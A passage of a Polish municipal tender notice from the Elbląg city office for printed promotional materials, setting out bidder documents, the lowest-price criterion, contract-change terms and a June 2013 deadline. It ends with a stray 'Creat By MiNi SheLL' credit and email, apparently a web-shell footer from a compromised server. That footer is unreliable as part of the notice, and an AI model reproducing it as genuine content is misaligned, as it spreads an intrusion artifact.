<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Potwierdzenia spełniania tego warunku Zamawiający dokona na podstawie oświadczenia wymienionego w pkt VI. ppkt 1.1. SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Potwierdzenia spełniania tego warunku Zamawiający dokona na podstawie oświadczenia wymienionego w pkt VI. ppkt 1.1. SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>Obowiązek wskazania przez Wykonawcę w wykazie dotyczy dostaw materiałów promocyjnych lub gadżetów reklamowych z nadrukiem o wartości min. 120 000,00 zł brutto każda dostawa.;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Oświadczenie w zakresie art. 25 ust. 1 pkt 2 ustawy Prawo zamówień publicznych.
Uwaga: a) Treść wymaganego Oświadczenia w zakresie art. 25 ust. 1 pkt 2 ustawy Prawo zamówień publicznych Zamawiający przekazuje na ZAŁĄCZNIKU NR 2a do SIWZ. Oświadczenie należy składać w oryginale. b) W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia wymagane oświadczenie może być złożone przez pełnomocnika w imieniu wszystkich Wykonawców lub przez wszystkich Wykonawców na jednym dokumencie lub przez każdego Wykonawcę odrębnie.</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Dokumenty stanowiące dowód, że Wykonawca będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności pisemne zobowiązanie podmiotów do oddania do dyspozycji Wykonawcy niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia - w przypadku Wykonawcy polegającego na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający określa następujące warunki, w jakich przewiduje możliwość dokonania zmian zawartej umowy, w szczególności w przypadku: - zmiany wartości zamówienia ze względu na zmianę VAT na dostarczane produkty, - zmiany projektu graficznego na dostarczanych produktach przy realizacji kolejnych etapów zamówienia, - zmiany terminu dostawy II etapu, - zmiany ilości lub rezygnacji z ujętych w III etapie materiałów promocyjnych.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.umelblag.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Elblągu Departament Organizacji i Nadzoru Referat Zamówień Publicznych pokój 404 82-300 Elbląg ul. Łączności 1.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.06.2013 godzina 09:30, miejsce: Urząd Miejski w Elblągu Departament Organizacji i Nadzoru Referat Zamówień Publicznych pokój 403 82-300 Elbląg ul. Łączności 1.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1. Dotyczy Sekcji II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA data rozpoczęcia:  data udzielenia zamówienia data zakończenia: 20 kwietnia 2014 rok w tym: I. etap dostawy w 2013 roku - 14 dni od daty udzielenia zamówienia II. etap dostawy - 30 października 2013 roku III. etap dostawy - 20 kwietnia 2014 roku 2. Uwaga do oświadczenia wymienionego w pkt VI. ppkt 1.1. SIWZ: a) Treść wymaganego Oświadczenia w zakresie art. 22 ust. 1 ustawy Prawo zamówień publicznych Zamawiający przekazuje na ZAŁĄCZNIKU NR 2a do SIWZ. Oświadczenie należy składać w oryginale. b) W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia wymagane oświadczenie może być złożone przez pełnomocnika w imieniu wszystkich Wykonawców lub przez wszystkich Wykonawców na jednym dokumencie lub przez każdego Wykonawcę odrębnie (jeżeli każdy z Wykonawców spełnia warunki udziału samodzielnie). 3. Uwaga do dokumentu wymienionego w pkt VI. ppkt 1.2. SIWZ: a) Dowodami, o których mowa powyżej jest: - poświadczenie, - oświadczenie Wykonawcy - jeżeli z uzasadnionych przyczyn o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać poświadczenia, o którym mowa powyżej. b) W przypadku, gdy podmiotem na rzecz którego dostawy wskazane w wykazie zostały wcześniej wykonane jest Gmina - Miasto Elbląg, Wykonawca nie ma obowiązku przedkładania dowodów, o których mowa powyżej. c) Wykonawca, w miejsce poświadczeń, o których mowa powyżej, może przedłożyć dokumenty potwierdzające należyte wykonanie dostaw, określone w § 1 ust. 1 pkt 3 rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2009 r. w sprawie rodzajów dokumentów, jakich może zadąć zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane (Dz. U. Nr 226, poz. 1817). d) Przedmiot wykazanych dostaw należy podać z taką szczegółowością, która umożliwi Zamawiającemu sprawdzenie spełniania warunku określonego w sekcji III.3.2) ogłoszenia. e) Obowiązek wskazania przez Wykonawcę w wykazie dotyczy dostaw materiałów promocyjnych lub gadżetów reklamowych z nadrukiem o wartości min. 120 000,00 zł brutto każda dostawa. f) Dowody, że dostawy zostały wykonane należycie, należy złożyć tylko do wskazanych w wykazie dostaw, o których mowa w sekcji III.3.2) ogłoszenia. g) Wartości potwierdzające spełnianie warunku udziału podane w walutach innych niż wskazane przez Zamawiającego dla wartości dostaw należy przeliczyć wg średniego kursu NBP na dzień odbioru tych dostaw, podając datę i kurs. h) W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia dokumenty składa ten lub ci z Wykonawców, którzy w imieniu wszystkich wykazywać będą spełnianie warunku określonego w sekcji III.3.2) ogłoszenia. i) Wykonawca, który polega na wiedzy i doświadczeniu innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków, zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia. 4. Uwaga do oświadczenia wymienionego w pkt VI.A. ppkt 1. SIWZ: a) Treść wymaganego Oświadczenia Zamawiający przekazuje na ZAŁĄCZNIKU NR 2b do SIWZ. b) W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia oświadczenie składa każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia. 5. Uwaga do dokumentu wymienionego w pkt VI.A. ppkt 2. SIWZ:
W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia dokument składa każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia. 6. Uwaga do dokumentu wymienionego w pkt VI.A. ppkt 3. SIWZ: W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia dokumenty składa każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia. 7. Uwaga do dokumentu wymienionego w pkt VI.A. ppkt 4. SIWZ:
W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia dokumenty składa każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia. 8. Uwaga do dokumentu wymienionego w pkt VI.A. ppkt 5. SIWZ:
W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia dokument składa każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia. 9. Dotyczy Sekcji III.4.3) Dokumenty podmiotów zagranicznych:
Jeżeli w kraju miejscu zamieszkania osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w sekcji III.4.3.1) ogłoszenia, zastępuje się je dokumentem zawierającym oświadczenie, w którym określa się także osoby uprawnione do reprezentacji Wykonawcy, złożone przed właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju miejsca zamieszkania osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, lub przed notariuszem. Dokumenty, o których mowa powyżej powinny być wystawione odpowiednio: nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert oraz nie wcześniej niż 3 miesiące przez upływem terminu składania ofert. 10. Opłata za SIWZ obejmuje koszty jej druku oraz przekazania. 11. Ocena spełniania warunków udziału w postępowaniu zostanie dokonana na podstawie złożonych dokumentów i oświadczeń  wymienionych w pkt VI.1. SIWZ, metodą spełnia / nie spełnia. 12. Warunki udziału, o których mowa w art. 22 ust. 1 ustawy oraz opis sposobu dokonania oceny ich spełniania mają na celu zweryfikowanie zdolności wykonawcy do należytego wykonania udzielanego zamówienia. UWAGA: Zgodnie z art. 26 ust. 2b ustawy Prawo zamówień publicznych Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com